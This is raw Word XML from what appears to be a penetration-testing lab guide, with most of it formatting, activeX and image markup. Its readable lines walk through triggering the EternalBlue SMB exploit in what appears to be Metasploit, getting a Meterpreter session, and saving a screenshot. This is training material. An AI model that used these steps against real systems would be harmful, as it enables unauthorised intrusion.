            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="452463454" name="図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shot"/>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B8E42E1" w14:textId="2BBAC29A"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63864894">
          <v:shape id="_x0000_i1253" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId116" w:name="DefaultOcxName55" w:shapeid="_x0000_i1253"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Since we have set the options required for the exploit module, we will now perform exploitation on the target machine by triggering the exploit. So, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA88E80" w14:textId="76B8418D"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319B4EB3" wp14:editId="6CE3B589">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="331152032" name="図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shot"/>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C6F9964" w14:textId="1F5DFF7A"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2E270950">
          <v:shape id="_x0000_i1252" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId118" w:name="DefaultOcxName56" w:shapeid="_x0000_i1252"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> session has been attained, meaning that we have successfully exploited the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in the target machine using the Eternal Blue exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C89D0" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>If you didn't receive the Meterpreter session at the first attempt, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591FCD66" w14:textId="15267A1B"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2A9D0533" wp14:editId="728C8DBD">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="930429284" name="図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sho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4179DEB" w14:textId="46BD35DC" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB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noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64DD45C6" wp14:editId="3494ACFD">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="987860829" name="図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shot"/>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9120E60" w14:textId="7D4463D6" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">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object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="17CAAB60">
          <v:shape id="_x0000_i1251" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId121" w:name="DefaultOcxName57" w:shapeid="_x0000_i1251"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully exploited the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability found in the target machine. Take a screenshot of the boot screen which appeared in the previous step and save it to the respective </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE2FBA" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">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D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>You have successfully scanned a network for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AEE298" w14:textId="77777777" w:rsidR="00A23699" w:rsidRPr="00D86EB7" w:rsidRDefault="00A23699"/>
    <w:sectPr w:rsidR="00A23699" w:rsidRPr="00D86EB7">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2271D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C8E66B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30231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62E"/>
    <w:rsid w:val="0037662E"/>
    <w:rsid w:val="00927A0F"/>
    <w:rsid w:val="00A23699"/>
    <w:rsid w:val="00D86E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5F295A46-D67B-4BAA-8427-DA02DC876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D86EB7"/>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D86EB7"/>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D86EB7"/>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D86EB7"/>
    <w:rPr>
      <w:rFonts w:ascii="ＭＳ Ｐゴシック" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="ＭＳ Ｐゴシック" w:cs="ＭＳ Ｐゴシック"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D86EB7"/>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3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D86EB7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="task-list-item">
    <w:name w:val="task-list-item"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D86EB7"/>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4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D86EB7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typetext">
    <w:name w:val="typetext"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D86E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490496">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1394934281">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1141730638">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="375"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1960406846">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1301349099">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="152334242">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1697925718">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1869635703">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="184560302">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="188185779">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1242594163">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="639968836">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="310912347">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="605696178">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="982344298">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="561986156">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1468089886">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="2082942356">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="508103392">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="848641860">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="812677242">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="2105833554">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="460390945">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="593392947">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1528834873">
                              <w:blockQuote w:val="1"/>
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="150"/>
                              <w:marBottom w:val="150"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="889613685">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0.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX21.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX43.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX54.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX5.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX3.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX16.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX24.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX38.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX49.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.wmf"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX28.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX44.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX46.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 